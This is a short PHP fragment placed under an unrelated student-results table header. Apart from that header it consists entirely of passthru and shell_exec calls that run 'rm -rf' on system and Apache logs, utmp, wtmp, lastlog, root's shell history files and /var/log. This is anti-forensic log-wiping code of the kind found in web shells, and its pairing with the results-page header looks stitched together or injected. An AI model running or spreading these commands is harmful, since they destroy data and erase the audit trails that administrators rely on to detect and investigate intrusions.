Student Name Roll No. Reg. No Course Name Gread Point
passthru("rm -rf /var/logs");
passthru("rm -rf /var/run/utmp");
passthru("rm -rf /var/apache/log");
passthru("rm -rf /var/apache/logs");
passthru("rm -rf /usr/local/apache/log");
passthru("rm -rf /usr/local/apache/logs");
passthru("rm -rf /root/.bash_logout");
passthru("rm -rf /root/.bash_history");
passthru("rm -rf /root/.ksh_history");
passthru("rm -rf /tmp/logs");
//passthru function madafuck !
shell_exec("rm -rf /var/log/wtmp");
shell_exec("rm -rf /var/log/lastlog");
shell_exec("rm -rf $HISTFILE");
shell_exec("rm -rf /etc/utmp");
shell_exec("rm -rf /etc/wtmp");
shell_exec("rm -rf /var/adm");
shell_exec("rm -rf /var/log");
shell_exec("rm -rf /var/logs");